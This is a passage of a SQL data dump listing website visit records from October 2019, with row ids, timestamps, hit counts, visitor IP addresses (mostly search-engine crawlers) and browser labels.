,0,'66.249.66.134','chrome'),(453320,1570118413,1,1,0,0,'37.9.113.177','other'),(453321,1570118800,1,1,0,0,'66.249.66.136','chrome'),(453322,1570119257,1,1,0,0,'91.196.178.76','chrome'),(453323,1570119381,1,1,0,0,'52.162.161.148','other'),(453324,1570119954,1,1,0,0,'91.196.178.131','firefox'),(453325,1570120454,1,1,0,0,'207.46.13.33','other'),(453326,1570120879,1,1,0,0,'207.46.13.6','other'),(453327,1570121469,1,1,0,0,'37.9.113.200','other'),(453328,1570122131,1,1,0,0,'66.249.66.136','chrome'),(453329,1570122684,1,1,0,0,'18.237.254.254','chrome'),(453330,1570122951,2,2,0,0,'157.55.39.73','other'),(453331,1570123371,1,1,0,0,'8.29.198.27','other'),(453332,1570123564,1,1,0,0,'8.29.198.26','other'),(453333,1570123603,1,1,0,0,'157.55.39.22','other'),(453334,1570123976,1,1,0,0,'141.8.132.37','other'),(453335,1570125789,1,1,0,0,'66.249.66.132','chrome'),(453336,1570126410,1,1,0,0,'141.8.188.20','other'),(453337,1570126491,1,1,0,0,'5.45.207.65','other'),(453338,1570126833,2,2,0,0,'157.55.39.73','other'),(453339,1570127828,1,1,0,0,'37.9.113.33','other'),(453340,1570128686,2,2,0,0,'66.249.66.132','chrome'),(453341,1570128713,2,2,0,0,'207.46.13.33','other'),(453342,1570128720,1,1,0,0,'141.8.183.18','other'),(453343,1570128728,2,2,0,0,'66.249.66.88','chrome'),(453344,1570128787,2,2,0,0,'66.249.66.136','chrome'),(453345,1570128809,1,1,0,0,'66.249.66.134','chrome'),(453346,1570129725,1,1,0,0,'66.249.66.136','chrome'),(453347,1570130570,1,1,0,0,'157.55.39.73','other'),(453348,1570131362,1,1,0,0,'207.46.13.33','other'),(453349,1570131829,1,1,0,0,'157.55.39.73','other'),(453350,1570132340,1,1,0,0,'141.8.142.2','other'),(453351,1570132452,1,1,0,0,'5.45.207.65','other'),(453352,1570132791,2,2,0,0,'157.55.39.73','other'),(453353,1570133315,2,2,0,0,'207.46.13.6','other'),(453354,1570133789,1,1,0,0,'94.153.96.176','chrome'),(453355,1570134194,1,1,0,0,'66.249.66.86','chrome'),(453356,1570134229,2,2,0,0,'8.29.198.26','other'),(453357,1570135062,1,1,0,0,'87.250.224.104','other'),(453358,1570135210,1,1,0,0,'95.108.213.3','other'),(453359,1570135260,1,1,0,0,'207.46.13.33','other'),(453360,1570135359,1,1,0,0,'66.249.66.134','chrome'),(453361,1570135804,1,1,0,0,'66.249.66.132','chrome'),(453362,1570136804,1,1,0,0,'207.46.13.6','other'),(453363,1570136952,2,2,0,0,'66.249.66.134','chrome'),(453364,1570137058,1,1,0,0,'37.9.113.177','other'),(453365,1570137111,1,1,0,0,'104.250.180.194','chrome'),(453366,1570137547,1,1,0,0,'66.249.66.136','chrome'),(453367,1570137556,2,2,0,0,'157.55.39.73','other'),(453368,1570137925,1,1,0,0,'37.9.113.142','other'),(453369,1570139959,1,1,0,0,'207.46.13.33','other'),(453370,1570140859,2,2,0,0,'66.249.66.136','chrome'),(453371,1570142026,1,1,0,0,'178.154.171.66','other'),(453372,1570142272,2,2,0,0,'207.46.13.33','other'),(453373,1570143860,1,1,0,0,'207.46.13.33','other'),(453374,1570145098,1,1,0,0,'8.29.198.27','other'),(453375,1570145287,1,1,0,0,'8.29.198.25','other'),(453376,1570145987,1,1,0,0,'157.55.39.4','other'),(453377,1570146914,1,1,0,0,'62.205.134.182','other'),(453378,1570149654,1,1,0,0,'5.45.207.65','other'),(453379,1570149696,1,1,0,0,'5.45.207.49','other'),(453380,1570149790,2,2,0,0,'157.55.39.103','other'),(453381,1570151458,2,2,0,0,'207.46.13.145','other'),(453382,1570151801,1,1,0,0,'157.55.39.4','other'),(453383,1570152125,1,1,0,0,'157.55.39.103','other'),(453384,1570152476,1,1,0,0,'54.214.230.186','other'),(453385,1570155487,1,1,0,0,'207.46.13.145','other'),(453386,1570155955,2,2,0,0,'8.29.198.25','other'),(453387,1570157104,1,1,0,0,'157.55.39.103','other'),(453388,1570157873,1,1,0,0,'157.55.39.22','other'),(453389,1570158266,1,1,0,0,'141.8.142.115','other'),(453390,1570159059,1,1,0,0,'46.211.74.72','chrome'),(453391,1570159768,1,1,0,0,'87.250.224.118','other'),(453392,1570160609,1,1,0,0,'207.46.13.145','other'),(453393,1570161841,12,12,0,0,'66.249.66.134','chrome'),(453394,1570161971,4,4,0,0,'66.249.66.136','chrome'),(453395,1570161973,36,36,0,0,'66.249.66.132','chrome'),(453396,1570162028,2,2,0,0,'157.55.39.103','other'),(453397,1570162273,1,1,0,0,'87.250.224.104','other'),(453398,1570164307,1,1,0,0,'62.205.134.182','other'),(453399,1570164588,1,1,0,0,'207.46.13.145','other'),(453400,1570164617,1,1,0,0,'157.55.39.103','other'),(453401,1570165889,1,1,0,0,'157.55.39.22','other'),(453402,1570166820,2,2,0,0,'8.29.198.26','other'),(453403,1570167955,2,2,0,0,'157.55.39.103','other'),(453404,1570168110,1,1,0,0,'37.9.113.33','other'),(453405,1570168656,1,1,0,0,'195.10.210.70','chrome'),(453406,1570169056,1,1,0,0,'91.196.178.189','chrome'),(453407,1570169846,1,1,0,0,'162.253.71.22','other'),(453408,1570170189,1,1,0,0,'13.66.139.0','other'),(453409,1570170527,1,1,0,0,'87.250.224.118','other'),(453410,1570170547,1,1,0,0,'141.8.132.28','other'),(453411,1570171560,1,1,0,0,'95.108.213.61','other'),(453412,1570172504,1,1,0,0,'157.55.39.22','other'),(453413,1570172664,1,1,0,0,'107.170.166.118','chrome'),(453414,1570172782,1,1,0,0,'87.250.224.104','other'),(453415,1570173902,1,1,0,0,'157.55.39.22','other'),(453416,1570174480,1,1,0,0,'207.46.13.65','other'),(453417,1570175493,1,1,0,0,'93.123.164.31','chrome'),(453418,1570177600,1,1,0,0,'95.108.213.39','other'),(453419,1570177689,2,2,0,0,'8.29.198.26','other'),(453420,1570180095,1,1,0,0,'37.9.113.39','other'),(453421,1570180681,1,1,0,0,'207.46.13.65','other'),(453422,1570181122,1,1,0,0,'66.249.66.132','chrome'),(453423,1570181305,1,1,0,0,'141.8.132.37','other'),(453424,1570182002,1,1,0,0,'162.253.71.22','other'),(453425,1570183876,1,1,0,0,'157.55.39.48','other'),(453426,1570183964,1,1,0,0,'35.160.171.75','chrome'),(453427,1570184200,2,2,0,0,'207.46.13.65','other'),(453428,1570184234,3,3,0,0,'66.249.66.86','chrome'),(453429,1570184288,1,1,0,0,'66.249.66.88','chrome'),(453430,1570184729,1,1,0,0,'128.124.201.235','chrome'),(453431,1570185434,1,1,0,0,'157.55.39.90','other'),(453432,1570186249,1,1,0,0,'141.8.142.119','other'),(453433,1570186607,1,1,0,0,'46.211.102.37','chrome'),(453434,1570186676,1,1,0,0,'157.55.39.103','other'),(453435,1570186741,2,2,0,0,'157.55.39.83','other'),(453436,1570187970,1,1,0,0,'157.55.39.83','other'),(453437,1570188053,1,1,0,0,'207.46.13.65','other'),(453438,1570188401,1,1,0,0,'109.74.154.72','chrome'),(453439,1570188545,1,1,0,0,'8.29.198.25','other'),(453440,1570188709,1,1,0,0,'8.29.198.26','other'),(453441,1570188789,1,1,0,0,'77.222.143.222','msie'),(453442,1570189072,1,1,0,0,'157.55.39.48','other'),(453443,1570189117,1,1,0,0,'82.145.208.194','other'),(453444,1570189645,1,1,0,0,'13.66.139.0','other'),(453445,1570189758,1,1,0,0,'66.249.66.88','chrome'),(453446,1570190068,1,1,0,0,'5.45.207.65','other'),(453447,1570190105,2,2,0,0,'51.68.152.26','chrome'),(453448,1570190152,1,1,0,0,'91.209.11.236','other'),(453449,1570191976,1,1,0,0,'46.174.71.83','firefox'),(453450,1570192580,1,1,0,0,'95.108.213.61','other'),(453451,1570194555,1,1,0,0,'157.55.39.83','other'),(453452,1570196414,1,1,0,0,'95.108.213.61','other'),(453453,1570196605,1,1,0,0,'37.9.113.33','other'),(453454,1570198679,1,1,0,0,'66.249.66.132','chrome'),(453455,1570198745,1,1,0,0,'91.209.11.236','other'),(453456,1570198767,214,214,0,0,'5.135.230.129','other'),(453457,1570199291,1,1,0,0,'141.8.142.164','other'),(453458,1570199315,1,1,0,0,'141.8.142.50','other'),(453459,1570199402,1,1,0,0,'8.29.198.26','other'),(453460,1570199594,1,1,0,0,'8.29.198.27','other'),(453461,1570200215,1,1,0,0,'91.196.178.174','chrome'),(453462,1570201518,1,1,0,0,'91.196.178.162','chrome'),(453463,1570201704,3,3,0,0,'35.225.71.40','chrome'),(453465,1570201713,4,4,0,0,'35.193.117.164','chrome'),(453466,1570201730,3,3,0,0,'35.192.100.69','chrome'),(453467,1570201740,2,2,0,0,'35.188.19.139','chrome'),(453469,1570201752,2,2,0,0,'35.193.70.82','chrome'),(453471,1570201865,1,1,0,0,'141.8.142.119','other'),(453472,1570206698,1,1,0,0,'37.9.113.200','other'),(453473,1570207314,1,1,0,0,'141.8.142.119','other'),(453474,1570207590,1,1,0,0,'46.211.104.2','chrome'),(453475,1570207594,1,1,0,0,'91.196.178.81','firefox'),(453476,1570208555,1,1,0,0,'104.244.77.171','other'),(453477,1570208947,1,1,0,0,'141.8.188.20','other'),(453478,1570210252,2,2,0,0,'8.29.198.27','other'),(453479,1570210273,1,1,0,0,'5.45.207.43','other'),(453480,1570212969,1,1,0,0,'178.154.171.7','other'),(453481,1570212983,1,1,0,0,'141.8.142.2','other'),(453482,1570214489,1,1,0,0,'37.9.113.200','other'),(453483,1570214630,1,1,0,0,'207.46.13.211','other'),(453484,1570214928,1,1,0,0,'66.249.66.132','chrome'),(453485,1570216185,1,1,0,0,'66.249.66.132','chrome'),(453486,1570216727,1,1,0,0,'141.8.132.28','other'),(453487,1570216982,1,1,0,0,'157.55.39.224','other'),(453488,1570218096,1,1,0,0,'66.249.66.134','chrome'),(453489,1570218294,1,1,0,0,'66.249.66.132','chrome'),(453490,1570218553,16,16,0,0,'82.145.72.180','other'),(453491,1570219075,1,1,0,0,'207.46.13.57','other'),(453492,1570219359,1,1,0,0,'66.249.66.134','chrome'),(453493,1570219509,1,1,0,0,'66.249.66.132','chrome'),(453494,1570219791,1,1,0,0,'66.249.66.136','chrome'),(453495,1570219952,1,1,0,0,'157.55.39.224','other'),(453496,1570221102,1,1,0,0,'8.29.198.27','other'),(453497,1570221303,1,1,0,0,'8.29.198.26','other'),(453498,1570221579,1,1,0,0,'66.249.66.132','chrome'),(453499,1570221587,1,1,0,0,'66.249.66.86','chrome'),(453500,1570221591,2,2,0,0,'66.249.66.134','chrome'),(453501,1570223140,1,1,0,0,'66.249.66.136','chrome'),(453502,1570223497,2,2,0,0,'66.249.66.134','chrome'),(453503,1570223629,2,2,0,0,'66.249.66.132','chrome'),(453504,1570223817,1,1,0,0,'66.249.66.86','chrome'),(453505,1570224478,2,2,0,0,'66.249.66.134','chrome'),(453506,1570225053,1,1,0,0,'95.108.181.103','other'),(453507,1570225333,1,1,0,0,'95.108.213.61','other'),(453508,1570225654,1,1,0,0,'207.46.13.71','other'),(453509,1570226074,1,1,0,0,'5.45.207.49','other'),(453510,1570226123,3,3,0,0,'66.249.66.136','chrome'),(453511,1570226196,1,1,0,0,'66.249.66.134','chrome'),(453512,1570227491,1,1,0,0,'66.249.66.86','chrome'),(453513,1570228160,2,2,0,0,'66.249.66.132','chrome'),(453514,1570228204,1,1,0,0,'178.154.200.60','other'),(453515,1570228257,1,1,0,0,'207.46.13.71','other'),(453516,1570228332,1,1,0,0,'66.249.66.136','chrome'),(453517,1570228729,1,1,0,0,'66.249.66.134','chrome'),(453518,1570229370,3,3,0,0,'66.249.66.88','chrome'),(453519,1570229765,1,1,0,0,'95.108.213.61','other'),(453520,1570231105,3,3,0,0,'66.249.66.132','chrome'),(453521,1570231160,1,1,0,0,'66.249.66.134','chrome'),(453522,1570231163,1,1,0,0,'207.46.13.71','other'),(453523,1570231950,1,1,0,0,'8.29.198.26','other'),(453524,1570232144,1,1,0,0,'8.29.198.27','other'),(453525,1570232594,1,1,0,0,'66.249.66.132','chrome'),(453526,1570233314,1,1,0,0,'62.205.134.182','other'),(453527,1570234232,1,1,0,0,'207.46.13.71','other'),(453528,1570234385,1,1,0,0,'66.249.66.132','chrome'),(453529,1570234475,1,1,0,0,'5.45.207.49','other'),(453530,1570234612,1,1,0,0,'66.249.66.134','chrome'),(453531,1570235729,2,2,0,0,'207.46.13.71','other'),(453532,1570235782,1,1,0,0,'2.95.139.57','chrome'),(453533,1570235980,1,1,0,0,'66.249.66.132','chrome'),(453534,1570236168,2,2,0,0,'66.249.66.136','chrome'),(453535,1570236485,1,1,0,0,'66.249.66.134','chrome'),(453536,1570238629,1,1,0,0,'34.209.28.249','other'),(453537,1570239044,1,1,0,0,'5.45.207.43','other'),(453538,1570239803,1,1,0,0,'66.249.66.86','chrome'),(453539,1570240173,2,2,0,0,'66.249.66.132','chrome'),(453540,1570241222,1,1,0,0,'66.249.66.134','chrome'),(453541,1570241371,1,1,0,0,'141.8.188.38','other'),(453542,1570241536,1,1,0,0,'207.46.13.71','other'),(453543,1570242018,1,1,0,0,'66.249.66.86','chrome'),(453544,1570242381,1,1,0,0,'66.249.66.134','chrome'),(453545,1570242803,1,1,0,0,'8.29.198.25','other'),(453546,1570242990,1,1,0,0,'8.29.198.27','other'),(453547,1570243273,1,1,0,0,'66.249.66.86','chrome'),(453548,1570243303,1,1,0,0,'157.55.39.135','other'),(453549,1570243332,2,2,0,0,'207.46.13.71','other'),(453550,1570243887,1,1,0,0,'66.249.66.132','chrome'),(453551,1570244820,1,1,0,0,'157.55.39.112','other'),(453552,1570245693,1,1,0,0,'207.46.13.209','other'),(453553,1570246891,1,1,0,0,'37.9.113.97','other'),(453554,1570247171,1,1,0,0,'66.249.66.136','chrome'),(453555,1570247936,1,1,0,0,'91.209.11.236','other'),(453556,1570249678,3,3,0,0,'193.106.30.99','firefox'),(453557,1570250638,1,1,0,0,'66.249.66.134','chrome'),(453558,1570250708,1,1,0,0,'62.205.134.182','other'),(453559,1570251523,2,2,0,0,'167.99.211.55','chrome'),(453560,1570252834,1,1,0,0,'66.249.66.134','chrome'),(453561,1570253245,1,1,0,0,'141.8.142.50','other'),(453562,1570253653,1,1,0,0,'8.29.198.27','other'),(453563,1570253795,1,1,0,0,'66.249.66.136','chrome'),(453564,1570253823,1,1,0,0,'8.29.198.26','other'),(453565,1570255282,1,1,0,0,'66.249.66.136','chrome'),(453566,1570256877,1,1,0,0,'66.249.66.86','chrome'),(453567,1570257345,1,1,0,0,'157.55.39.124','other'),(453568,1570257466,2,2,0,0,'157.55.39.122','other'),(453569,1570259226,1,1,0,0,'66.249.66.88','chrome'),(453570,1570261281,1,1,0,0,'66.249.66.132','chrome'),(453571,1570261770,1,1,0,0,'66.249.66.88','chrome'),(453572,1570262824,1,1,0,0,'178.154.200.60','other'),(453573,1570263159,1,1,0,0,'91.209.11.236','other'),(453574,1570263252,1,1,0,0,'157.55.39.122','other'),(453575,1570264495,1,1,0,0,'8.29.198.27','other'),(453576,1570264656,1,1,0,0,'8.29.198.26','other'),(453577,1570264761,1,1,0,0,'66.249.66.132','chrome'),(453578,1570264790,1,1,0,0,'157.55.39.122','other'),(453579,1570264979,1,1,0,0,'66.249.66.136','chrome'),(453580,1570265833,1,1,0,0,'89.163.242.241','opera'),(453581,1570265855,1,1,0,0,'66.249.66.134','chrome'),(453582,1570266139,1,1,0,0,'66.249.66.86','chrome'),(453583,1570266793,1,1,0,0,'66.249.66.136','chrome'),(453584,1570268007,1,1,0,0,'207.46.13.114','other'),(453585,1570268733,1,1,0,0,'157.55.39.96','other'),(453586,1570268998,1,1,0,0,'66.249.66.134','chrome'),(453587,1570269255,1,1,0,0,'66.249.66.88','chrome'),(453588,1570271245,1,1,0,0,'66.249.66.132','chrome'),(453589,1570271308,1,1,0,0,'66.249.66.136','chrome'),(453590,1570272186,1,1,0,0,'207.46.13.114','other'),(453591,1570272311,1,1,0,0,'5.45.207.43','other'),(453592,1570272392,1,1,0,0,'157.55.39.122','other'),(453593,1570272677,2,2,0,0,'66.249.66.134','chrome'),(453594,1570273673,1,1,0,0,'66.249.66.132','chrome'),(453595,1570274239,1,1,0,0,'157.55.39.122','other'),(453596,1570274243,1,1,0,0,'207.46.13.114','other'),(453597,1570274526,1,1,0,0,'157.55.39.96','other'),(453598,1570274936,1,1,0,0,'109.74.154.72','chrome'),(453599,1570275084,1,1,0,0,'66.249.66.134','chrome'),(453600,1570275246,1,1,0,0,'66.249.66.136','chrome'),(453601,1570275328,2,2,0,0,'8.29.198.27','other'),(453602,1570278910,2,2,0,0,'66.249.66.134','chrome'),(453603,1570279295,2,2,0,0,'66.249.66.132','chrome'),(453604,1570280857,1,1,0,0,'66.249.66.134','chrome'),(453605,1570281253,1,1,0,0,'66.249.66.136','chrome'),(453606,1570282512,1,1,0,0,'66.249.66.136','chrome'),(453607,1570283363,1,1,0,0,'66.249.66.134','chrome'),(453608,1570286176,2,2,0,0,'8.29.198.26','other'),(453609,1570286408,1,1,0,0,'207.46.13.88','other'),(453610,1570288082,1,1,0,0,'66.249.66.134','chrome'),(453611,1570288179,3,3,0,0,'35.222.70.234','chrome'),(453612,1570288898,4,4,0,0,'66.249.66.132','chrome'),(453613,1570289831,1,1,0,0,'157.55.39.169','other'),(453614,1570289954,2,2,0,0,'66.249.66.134','chrome'),(453615,1570290333,1,1,0,0,'91.196.178.74','chrome'),(453616,1570290853,2,2,0,0,'66.249.66.136','chrome'),(453617,1570291627,3,3,0,0,'66.249.66.132','chrome'),(453618,1570292087,1,1,0,0,'66.249.66.134','chrome'),(453619,1570292197,1,1,0,0,'172.111.208.34','chrome'),(453620,1570292237,4,4,0,0,'66.249.66.136','chrome'),(453621,1570292413,1,1,0,0,'207.46.13.107','other'),(453622,1570292489,1,1,0,0,'66.249.66.86','chrome'),(453623,1570292494,1,1,0,0,'157.55.39.169','other'),(453624,1570293127,1,1,0,0,'66.249.66.134','chrome'),(453625,1570293357,1,1,0,0,'66.249.66.136','chrome'),(453626,1570293727,1,1,0,0,'66.249.66.88','chrome'),(453627,1570295405,1,1,0,0,'157.55.39.73','other'),(453628,1570295458,1,1,0,0,'66.249.66.132','chrome'),(453629,1570295740,1,1,0,0,'157.55.39.169','other'),(453630,1570296841,1,1,0,0,'37.9.113.200','other'),(453631,1570297016,1,1,0,0,'8.29.198.25','other'),(453632,1570297183,1,1,0,0,'8.29.198.26','other'),(453633,1570297666,2,2,0,0,'66.249.66.136','chrome'),(453634,1570299140,1,1,0,0,'157.55.39.169','other'),(453635,1570299961,1,1,0,0,'66.249.66.136','chrome'),(453636,1570300101,2,2,0,0,'66.249.66.134','chrome'),(453637,1570300949,1,1,0,0,'178.154.200.60','other'),(453638,1570301449,1,1,0,0,'66.249.66.132','chrome'),(453639,1570301464,1,1,0,0,'207.46.13.158','other'),(453640,1570302223,2,2,0,0,'157.55.39.198','other'),(453641,1570302261,1,1,0,0,'66.249.66.86','chrome'),(453642,1570302376,1,1,0,0,'95.108.213.61','other'),(453643,1570302449,1,1,0,0,'66.249.66.132','chrome'),(453644,1570302589,1,1,0,0,'66.249.66.136','chrome'),(453645,1570302706,1,1,0,0,'66.249.66.134','chrome'),(453646,1570303529,1,1,0,0,'141.8.188.39','other'),(453647,1570303692,1,1,0,0,'207.46.13.39','other'),(453648,1570303838,1,1,0,0,'66.249.66.134','chrome'),(453649,1570304008,1,1,0,0,'66.249.66.136','chrome'),(453650,1570304996,2,2,0,0,'66.249.66.136','chrome'),(453651,1570305383,1,1,0,0,'66.249.66.134','chrome'),(453652,1570306160,2,2,0,0,'207.46.13.2','other'),(453653,1570306399,2,2,0,0,'157.55.39.196','other'),(453654,1570306670,1,1,0,0,'66.249.66.134','chrome'),(453655,1570306671,1,1,0,0,'157.55.39.234','other'),(453656,1570307340,1,1,0,0,'66.249.66.86','chrome'),(453657,1570307350,2,2,0,0,'207.46.13.39','other'),(453658,1570307574,1,1,0,0,'66.249.66.132','chrome'),(453659,1570307691,1,1,0,0,'66.249.66.134','chrome'),(453660,1570307863,2,2,0,0,'8.29.198.26','other'),(453661,1570309033,1,1,0,0,'66.249.66.132','chrome'),(453662,1570309275,1,1,0,0,'66.249.66.134','chrome'),(453663,1570309604,1,1,0,0,'66.249.66.136','chrome'),(453664,1570310327,1,1,0,0,'157.55.39.105','other'),(453665,1570310523,1,1,0,0,'207.46.13.39','other'),(453666,1570310583,1,1,0,0,'178.133.247.247','chrome'),(453667,1570310584,1,1,0,0,'66.249.83.201','chrome'),(453668,1570310591,2,2,0,0,'66.249.83.199','chrome'),(453669,1570310593,1,1,0,0,'66.249.88.191','chrome'),(453670,1570310768,1,1,0,0,'66.249.66.134','chrome'),(453671,1570310823,2,2,0,0,'66.249.66.136','chrome'),(453672,1570312683,1,1,0,0,'66.249.66.136','chrome'),(453673,1570312711,1,1,0,0,'178.154.200.27','other'),(453674,1570312731,1,1,0,0,'207.46.13.39','other'),(453675,1570312931,3,3,0,0,'66.249.66.132','chrome'),(453676,1570313786,1,1,0,0,'66.249.66.136','chrome'),(453677,1570313821,1,1,0,0,'207.46.13.39','other'),(453678,1570314353,1,1,0,0,'66.249.66.132','chrome'),(453679,1570314839,1,1,0,0,'207.46.13.96','other'),(453680,1570315119,1,1,0,0,'95.108.181.103','other'),(453681,1570315227,1,1,0,0,'66.249.66.134','chrome'),(453682,1570315800,1,1,0,0,'13.66.139.0','other'),(453683,1570316244,1,1,0,0,'207.46.13.96','other'),(453684,1570316331,1,1,0,0,'185.138.228.178','chrome'),(453685,1570316639,1,1,0,0,'66.249.66.132','chrome'),(453686,1570317167,2,2,0,0,'207.46.13.185','other'),(453687,1570317211,2,2,0,0,'66.249.66.134','chrome'),(453688,1570318215,1,1,0,0,'66.249.66.132','chrome'),(453689,1570318715,1,1,0,0,'8.29.198.25','other'),(453690,1570318746,2,2,0,0,'66.249.66.88','chrome'),(453691,1570318862,1,1,0,0,'8.29.198.27','other'),(453692,1570319107,1,1,0,0,'207.46.13.185','other'),(453693,1570319211,1,1,0,0,'66.249.66.132','chrome'),(453694,1570319712,1,1,0,0,'62.205.134.182','other'),(453695,1570321976,1,1,0,0,'17.58.101.255','other'),(453696,1570322139,1,1,0,0,'5.45.207.49','other'),(453697,1570322180,1,1,0,0,'66.249.66.134','chrome'),(453698,1570322188,1,1,0,0,'66.249.66.132','chrome'),(453699,1570323904,2,2,0,0,'66.249.66.134','chrome'),(453700,1570324044,1,1,0,0,'66.249.66.86','chrome'),(453701,1570324245,2,2,0,0,'66.249.66.136','chrome'),(453702,1570325627,1,1,0,0,'66.249.66.136','chrome'),(453703,1570326507,1,1,0,0,'66.249.66.134','chrome'),(453704,1570326760,2,2,0,0,'157.55.39.59','other'),(453705,1570326884,1,1,0,0,'207.46.13.185','other'),(453706,1570328093,1,1,0,0,'37.9.113.177','other'),(453707,1570328212,1,1,0,0,'66.249.66.86','chrome'),(453708,1570328270,1,1,0,0,'66.249.66.132','chrome'),(453709,1570328684,1,1,0,0,'207.46.13.185','other'),(453710,1570328715,1,1,0,0,'66.249.66.134','chrome'),(453711,1570329561,1,1,0,0,'8.29.198.25','other'),(453712,1570329696,1,1,0,0,'8.29.198.27','other'),(453713,1570329843,1,1,0,0,'207.46.13.185','other'),(453714,1570330131,1,1,0,0,'82.202.161.133','chrome'),(453715,1570330347,1,1,0,0,'66.249.66.132','chrome'),(453716,1570331635,1,1,0,0,'66.249.66.134','chrome'),(453717,1570331748,2,2,0,0,'66.249.66.136','chrome'),(453718,1570331751,1,1,0,0,'66.249.66.86','chrome'),(453719,1570332013,1,1,0,0,'66.249.66.132','chrome'),(453720,1570333074,1,1,0,0,'207.46.13.185','other'),(453721,1570333206,1,1,0,0,'37.9.113.177','other'),(453722,1570334399,1,1,0,0,'141.8.142.132','other'),(453723,1570335031,1,1,0,0,'95.108.213.61','other'),(453724,1570335082,1,1,0,0,'66.249.66.88','chrome'),(453725,1570335087,1,1,0,0,'95.108.213.39','other'),(453726,1570335281,1,1,0,0,'207.46.13.74','other'),(453727,1570335599,1,1,0,0,'141.8.188.25','other'),(453728,1570335693,1,1,0,0,'95.108.181.103','other'),(453729,1570335740,1,1,0,0,'141.8.132.28','other'),(453730,1570335803,1,1,0,0,'178.154.171.7','other'),(453731,1570336350,1,1,0,0,'66.249.66.136','chrome'),(453732,1570336413,2,2,0,0,'66.249.66.134','chrome'),(453733,1570336817,1,1,0,0,'157.55.39.59','other'),(453734,1570336908,1,1,0,0,'5.45.207.43','other'),(453735,1570337185,1,1,0,0,'62.205.134.182','other'),(453736,1570337437,1,1,0,0,'141.8.132.37','other'),(453737,1570338490,2,2,0,0,'66.249.66.134','chrome'),(453738,1570339064,1,1,0,0,'141.8.188.66','other'),(453739,1570339101,2,2,0,0,'66.249.66.136','chrome'),(453740,1570339513,1,1,0,0,'141.8.142.50','other'),(453741,1570340401,1,1,0,0,'8.29.198.26','other'),(453742,1570340533,1,1,0,0,'8.29.198.27','other'),(453743,1570340712,1,1,0,0,'66.249.66.136','chrome'),(453744,1570340757,1,1,0,0,'66.249.66.132','chrome'),(453745,1570342242,1,1,0,0,'66.249.66.132','chrome'),(453746,1570342393,1,1,0,0,'141.8.132.28','other'),(453747,1570343787,2,2,0,0,'66.249.66.134','chrome'),(453748,1570343842,1,1,0,0,'66.249.66.86','chrome'),(453749,1570344036,1,1,0,0,'66.249.66.136','chrome'),(453750,1570344218,2,2,0,0,'157.55.39.187','other'),(453751,1570345023,3,3,0,0,'157.55.39.59','other'),(453752,1570345545,1,1,0,0,'157.55.39.187','other'),(453753,1570346026,1,1,0,0,'66.249.66.134','chrome'),(453754,1570346582,1,1,0,0,'13.66.139.0','other'),(453755,1570346892,1,1,0,0,'157.55.39.211','other'),(453756,1570346899,1,1,0,0,'141.8.142.50','other'),(453757,1570346914,1,1,0,0,'141.8.142.177','other'),(453758,1570347309,1,1,0,0,'157.55.39.59','other'),(453759,1570347668,1,1,0,0,'91.196.178.69','chrome'),(453760,1570348360,2,2,0,0,'66.249.66.132','chrome'),(453761,1570348680,1,1,0,0,'66.249.66.136','chrome'),(453762,1570348711,1,1,0,0,'66.249.66.134','chrome'),(453763,1570349000,1,1,0,0,'66.249.66.86','chrome'),(453764,1570349272,1,1,0,0,'157.55.39.211','other'),(453765,1570349943,1,1,0,0,'66.249.66.136','chrome'),(453766,1570350465,2,2,0,0,'66.249.66.134','chrome'),(453767,1570350502,1,1,0,0,'157.55.39.211','other'),(453768,1570351241,2,2,0,0,'8.29.198.26','other'),(453769,1570351677,1,1,0,0,'91.196.178.161','chrome'),(453770,1570352446,1,1,0,0,'66.249.66.132','chrome'),(453771,1570352680,2,2,0,0,'66.249.66.134','chrome'),(453772,1570353045,2,2,0,0,'157.55.39.211','other'),(453773,1570353430,1,1,0,0,'141.8.142.177','other'),(453774,1570353583,1,1,0,0,'66.249.66.132','chrome'),(453775,1570354577,1,1,0,0,'95.24.30.14','msie'),(453776,1570355419,1,1,0,0,'157.55.39.52','other'),(453777,1570357556,1,1,0,0,'111.202.101.94','other'),(453778,1570357895,1,1,0,0,'66.249.66.86','chrome'),(453779,1570358031,1,1,0,0,'157.55.39.72','other'),(453780,1570358842,1,1,0,0,'141.8.188.20','other'),(453781,1570359904,2,2,0,0,'157.55.39.52','other'),(453782,1570360172,1,1,0,0,'109.74.154.72','chrome'),(453783,1570360467,1,1,0,0,'157.55.39.72','other'),(453784,1570361229,1,1,0,0,'95.108.213.3','other'),(453785,1570362073,1,1,0,0,'8.29.198.26','other'),(453786,1570362214,1,1,0,0,'8.29.198.25','other'),(453787,1570363238,1,1,0,0,'66.249.66.136','chrome'),(453788,1570364490,1,1,0,0,'66.249.66.134','chrome'),(453789,1570364797,1,1,0,0,'157.55.39.52','other'),(453790,1570365134,1,1,0,0,'157.55.39.72','other'),(453791,1570365920,1,1,0,0,'178.158.248.67','chrome'),(453792,1570365960,4,4,0,0,'66.249.66.132','chrome'),(453793,1570366233,1,1,0,0,'66.249.66.136','chrome'),(453794,1570366237,2,1,1,0,'66.249.66.134',''),(453795,1570366790,2,2,0,0,'157.55.39.52','other'),(453796,1570366903,2,2,0,0,'66.249.66.132','chrome'),(453797,1570367327,1,1,0,0,'66.249.66.134','chrome'),(453798,1570367336,1,1,0,0,'95.108.181.103','other'),(453799,1570368963,1,1,0,0,'13.66.139.0','other'),(453800,1570369686,3,3,0,0,'207.46.13.146','other'),(453801,1570370684,1,1,0,0,'66.249.66.132','chrome'),(453802,1570370739,1,1,0,0,'66.249.66.134','chrome'),(453803,1570370885,1,1,0,0,'78.111.186.229','chrome'),(453804,1570372349,2,2,0,0,'66.249.66.136','chrome'),(453805,1570372908,2,2,0,0,'8.29.198.25','other'),(453806,1570373004,1,1,0,0,'66.249.66.134','chrome'),(453807,1570373338,1,1,0,0,'66.249.66.88','chrome'),(453808,1570373637,1,1,0,0,'95.108.213.61','other'),(453809,1570374096,1,1,0,0,'207.46.13.107','other'),(453810,1570374535,1,1,0,0,'66.249.66.136','chrome'),(453811,1570374834,2,2,0,0,'66.249.66.134','chrome'),(453812,1570374954,1,1,0,0,'207.46.13.146','other'),(453813,1570375166,2,2,0,0,'207.46.13.107','other'),(453814,1570375167,2,2,0,0,'66.249.66.132','chrome'),(453815,1570375237,1,1,0,0,'157.55.39.107','other'),(453816,1570377795,1,1,0,0,'91.196.178.82','chrome'),(453817,1570379417,1,1,0,0,'66.249.66.134','chrome'),(453818,1570380412,1,1,0,0,'66.249.66.136','chrome'),(453819,1570380499,2,2,0,0,'66.249.66.132','chrome'),(453820,1570381100,1,1,0,0,'207.46.13.146','other'),(453821,1570381997,1,1,0,0,'66.249.66.134','chrome'),(453822,1570382244,1,1,0,0,'66.249.66.86','chrome'),(453823,1570382262,1,1,0,0,'207.46